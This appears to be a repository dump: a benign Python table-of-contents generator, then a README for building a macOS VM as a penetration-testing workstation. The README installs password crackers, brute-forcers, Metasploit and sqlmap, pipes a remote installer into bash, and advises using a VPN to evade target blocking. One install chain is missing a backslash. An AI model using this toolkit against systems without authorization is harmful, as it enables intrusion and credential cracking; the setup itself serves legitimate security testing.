LVL2_HEADING_PATTERN = re.compile("(?m)^#{2}(?!#)(.*)") 15 | 16 | 17 | def run(): 18 | logging.info("Generating tables of contents...") 19 | filenames = get_filenames() 20 | 21 | if not filenames: 22 | logging.warning("No markdown files found!") 23 | return 24 | logging.debug("Working with files: " + str(filenames)) 25 | 26 | for filename in filenames: 27 | generate_toc(filename) 28 | 29 | logging.info("Done!") 30 | 31 | 32 | def generate_toc(filename): 33 | with open(filename, mode="r+") as file: 34 | content_lines = file.read().splitlines(True) 35 | 36 | if not content_lines[0].startswith("#"): 37 | logging.warning("File " + filename + " doesn't start with a header. Skipping...") 38 | return 39 | 40 | first_header_index = -1 41 | for i in range(1, len(content_lines)): 42 | if LVL2_HEADING_PATTERN.match(content_lines[i]): 43 | first_header_index = i 44 | break 45 | elif content_lines[i].startswith('#'): 46 | logging.warning( 47 | "File " + filename + " has another header between lvl1 and the first lvl2 headers. Skipping...") 48 | return 49 | 50 | if first_header_index == -1: 51 | logging.warning("File " + filename + " doesn't have lvl2 headers. Skipping...") 52 | return 53 | 54 | toc_str = '' 55 | code_block = False 56 | for line in content_lines[1:]: 57 | 58 | # Marks the start and end of a code block 59 | if line.startswith("```"): 60 | if code_block: 61 | code_block = False 62 | else: 63 | code_block = True 64 | 65 | # Handles the header line 66 | elif line.startswith('#'): 67 | 68 | # No lvl7 headers exist 69 | if line.startswith('#######'): 70 | continue 71 | 72 | # No headers can exist inside code blocks 73 | if code_block: 74 | continue 75 | 76 | # Adds tabulation according to the level of the header 77 | for i in range(2, len(line)): 78 | if line[i] == '#': 79 | toc_str += ' ' 80 | else: 81 | break 82 | 83 | # Adds the header's label 84 | line = line.lstrip('#').strip(' \n') 85 | toc_str += '* [' + line + ']' 86 | 87 | # Generates an anchor for the header 88 | anchor_list = list() 89 | last_underscore_i = -1 90 | to_remove = list() 91 | inline_code = False 92 | for i in range(0, len(line)): 93 | 94 | # Replaces all spaces with hyphens 95 | if line[i] == ' ' or line[i] == '-': 96 | anchor_list.append('-') 97 | 98 | # Marks a start of an inline code piece 99 | elif line[i] == '`': 100 | if inline_code: 101 | inline_code = False 102 | else: 103 | inline_code = True 104 | 105 | # Marks for removal an even number of underscores if outside the inline code piece 106 | elif line[i] == '_': 107 | if not inline_code: 108 | if last_underscore_i == -1: 109 | last_underscore_i = i 110 | anchor_list.append('_') 111 | else: 112 | to_remove.append(last_underscore_i) 113 | last_underscore_i = -1 114 | else: 115 | anchor_list.append('_') 116 | 117 | # Simply adds other alphanumeric chars lowercased 118 | elif line[i].isalnum(): 119 | anchor_list.append(line[i].lower()) 120 | 121 | # Removes marked characters 122 | for i in to_remove: 123 | del anchor_list[i] 124 | 125 | # Adds generated anchor to the table 126 | toc_str += '(#' + ''.join(anchor_list) + ')\n' 127 | 128 | logging.debug("Prepared the table of contents for the file %s:\n%s", filename, toc_str) 129 | 130 | # Replaces everything between lvl1 and first lvl2 headers with the table of contents 131 | content_with_toc = content_lines[0] + toc_str + os.linesep + ''.join(content_lines[first_header_index:]) 132 | 133 | file.seek(0) 134 | file.write(content_with_toc) 135 | file.truncate() 136 | logging.debug("%s file is successfully updated!", filename) 137 | 138 | 139 | def get_filenames(): 140 | ignore_patterns = set() 141 | if os.path.exists(IGNORE_FILE_NAME): 142 | with open(IGNORE_FILE_NAME, mode="r") as file: 143 | for pattern in file.readlines(): 144 | ignore_patterns.add(re.compile(''.join(c for c in pattern if c.isprintable()))) # Printable chars only 145 | 146 | current_dir = os.getcwd() 147 | filenames = set() 148 | 149 | for root, directories, files in os.walk(current_dir): 150 | for filename in files: 151 | rel_filename = os.path.join(os.path.relpath(root, current_dir), filename).removeprefix("./") 152 | if not is_file_ignored(rel_filename, ignore_patterns): 153 | filenames.add(rel_filename) 154 | return filenames 155 | 156 | 157 | def is_file_ignored(filename, patterns): 158 | if not filename.lower().endswith(".md"): 159 | return True 160 | 161 | for pattern in patterns: 162 | if pattern.match(filename): 163 | return True 164 | 165 | 166 | if __name__ == "__main__": 167 | parser = argparse.ArgumentParser(usage=USAGE, 168 | description=DESCRIPTION) 169 | parser.add_argument("-d", "--debug", action="store_true", help="set log level to DEBUG") 170 | args = parser.parse_args() 171 | 172 | if args.debug: 173 | logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG) 174 | else: 175 | logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO) 176 | 177 | run() 178 | -------------------------------------------------------------------------------- /vm_config/README.md: -------------------------------------------------------------------------------- 1 | # Virtual Machine Configuration 2 | * [Parallels configuration](#parallels-configuration) 3 | * [Configuring Parallels](#configuring-parallels) 4 | * [Configuring the VM (in the control center)](#configuring-the-vm-in-the-control-center) 5 | * [VM setup](#vm-setup) 6 | * [System Settings](#system-settings) 7 | * [Terminal](#terminal) 8 | * [Finder](#finder) 9 | * [Unmounting My Shared Files disk](#unmounting-my-shared-files-disk) 10 | * [Setup VPN](#setup-vpn) 11 | * [Installing and configuring useful tools](#installing-and-configuring-useful-tools) 12 | 13 | ## Parallels configuration 14 | 15 | ### Configuring Parallels 16 | 17 | - Connect devices to the host system only 18 | 19 | ### Configuring the VM (in the control center) 20 | 21 | - Install MacOS VM; 22 | - Parallels Tools on the guest VM (MacOSVM -> Install Parallels Tools). 23 | - 4 CPUs, 8GB memory, 128GB disk; 24 | - Disable Mapping Mac volumes to VM; 25 | 26 | ## VM setup 27 | 28 | ### System Settings 29 | 30 | - Turn off bluetooth; 31 | - General -> Disable AirDrop and Handoff; 32 | - General -> Sharing -> Hostname 33 | - Desktop -> Disable stage manager on Desktop; 34 | - Desktop -> Disable suggestions and recent items; 35 | - Desktop -> Disable click wallpaper to reveal Desktop; 36 | - Desktop -> Right bottom hot corner to show Desktop; 37 | - Turn off screen lock and screen saver; 38 | - Remove all items from Dock. 39 | 40 | ### Terminal 41 | 42 | - Add to Dock; 43 | - Make Homebrew default profile; 44 | - Bump font size to 15; 45 | 46 | ### Finder 47 | 48 | - Add current user to shortcuts and remove unused ones; 49 | - Apply default group by name and sort by kind in grid view. 50 | 51 | ### Unmounting My Shared Files disk 52 | 53 | ```bash 54 | diskutil unmount /dev/disk1 # use mount command to check the name 55 | ``` 56 | 57 | ### Setup VPN 58 | 59 | - Use whatever VPN you like (you can easily reconnect in case you send too many bad requests to a target, and it blocks 60 | you); 61 | 62 | - Check VPN connection: 63 | 64 | ```bash 65 | curl https://ipinfo.io 66 | ``` 67 | 68 | ## Installing and configuring useful tools 69 | 70 | - Enter Downloads folder first: 71 | 72 | ```bash 73 | cd ~/Downloads 74 | ``` 75 | 76 | - Firefox: 77 | - Install and add to Dock; 78 | - Go to `about:config` 79 | - Set `browser.urlbar.trimURLs` to `false` 80 | - Make Firefox a default browser. 81 | - Change Home page to blank. 82 | - Delete all default bookmarks. 83 | - Disable saving passwords. 84 | - Install command-line-tools: 85 | 86 | - Install Command-Line Tools: 87 | 88 | ```bash 89 | xcode-select --install 90 | ``` 91 | 92 | - Login to Github and add an ssh key: 93 | 94 | ```bash 95 | ssh-keygen -t ed25519 -C "" 96 | eval "$(ssh-agent -s)" 97 | ssh-add ~/.ssh/id_ed25519 98 | cat ~/.ssh/id_ed25519.pub 99 | ``` 100 | 101 | - Download pentest-tools and clean the keys: 102 | 103 | ```bash 104 | git clone git@github.com:maksyche/pentesting-tools.git ~/pentesting-tools \ 105 | && rm -rf ~/pentesting-tools/.git \ 106 | && rm -f ~/.ssh/id_ed25519 \ 107 | && rm -f ~/.ssh/id_ed25519.pub 108 | ``` 109 | 110 | - Install Homebrew: 111 | 112 | ```bash 113 | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" \ 114 | && (echo; echo 'eval "$(/opt/homebrew/bin/brew shellenv)"') >> /Users/kali/.zprofile \ 115 | && eval "$(/opt/homebrew/bin/brew shellenv)" 116 | ``` 117 | 118 | - Add more things to PATH: 119 | 120 | ```bash 121 | sudo bash -c "echo /Users/kali/Library/Python/3.9/bin >> /etc/paths" 122 | ``` 123 | 124 | - Install a bunch of useful tools: 125 | 126 | ```bash 127 | brew install wget \ 128 | && pip3 install wfuzz \ 129 | && brew install hashcat \ 130 | && brew install john-jumbo \ 131 | && brew install feroxbuster \ 132 | && brew install --cask sublime-text \ 133 | && git clone https://github.com/victorporof/Sublime-HTMLPrettify.git ~/Library/Application\ Support/Sublime\ Text/Packages/Sublime-HTMLPrettify \ 134 | && brew install openvpn \ 135 | && brew install rlwrap \ 136 | && brew install gnu-sed \ 137 | && brew install node \ 138 | && brew install brew-gem \ 139 | && brew-gem install fpm \ 140 | && brew install --cask mysql-shell \ 141 | && brew install sqlcmd \ 142 | && brew install redis \ 143 | && sudo npm install --global jwt-cracker \ 144 | && sudo pip3 install droopescan \ 145 | && pip3 install wesng \ 146 | && wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_11_0/impacket-0.11.0.tar.gz \ 147 | && tar -xzf impacket-* \ 148 | && cd impacket-0.11.0 \ 149 | && sudo pip3 install . \ 150 | && cd .. \ 151 | && brew-gem install evil-winrm \ 152 | && sudo pip3 install pyftpdlib \ 153 | && brew-gem install highline \ 154 | && sudo npm install --global xls2csv \ 155 | && sudo npm install --global xlsx2csv \ 156 | && sudo npm install --global doc2txt \ 157 | && sudo npm install --global docx2txt 158 | && sudo pip3 install oletools \ 159 | && brew install putty \ 160 | && softwareupdate --install-rosetta --agree-to-license \ 161 | && brew install --cask metasploit \ 162 | && brew install jq \ 163 | && brew install sqlmap \ 164 | && brew install name-that-hash \ 165 | && git clone https://github.com/spipm/Depix.git /Users/kali/depix \ 166 | && brew install net-snmp \ 167 | && brew install hydra \ 168 | && sudo -H pip3 install dnsrecon \ 169 | && git clone https://github.com/aboul3la/Sublist3r.git /Users/kali/sublist3r \ 170 | && sudo pip install -r /Users/kali/sublist3r/requirements.txt \ 171 | && brew install awscli \ 172 | && brew install inetutils 173 | ``` 174 | 175 | - Download dictionaries: 176 | 177 | ```bash 178 | wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt \ 179 | && gsed -i '/^\s*$/d' ~/rockyou.txt \ 180 | && git clone https://github.com/danielmiessler/SecLists.git \ 181 | && git clone https://github.com/xmendez/wfuzz.git \ 182 | && mv ./wfuzz/wordlist ~/wfuzz_wordlist \ 183 | && rm -rf ./wfuzz 184 | ``` 185 | 186 | - Nmap: https://nmap.org/download.html#macosx (open Zenmap to install Rozetta afterwards); 187 | - Burp: https://portswigger.net/burp/communitydownload (then go to http://localhost:8080/ and import the certificate to 188 | Firefox); 189 | - ZAP (Free intruder, do the same thing with the certificate): https://www.zaproxy.org/download/ 190 | - FoxyProxy for Burp: https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/ (then configure `127.0.0.1` `8080` 191 | proxy); 192 | - Install Python2: https://www.python.org/downloads/release/python-2718/; 193 | - Install Go: https://go.dev/dl/; --------------------------------------------------------------------------------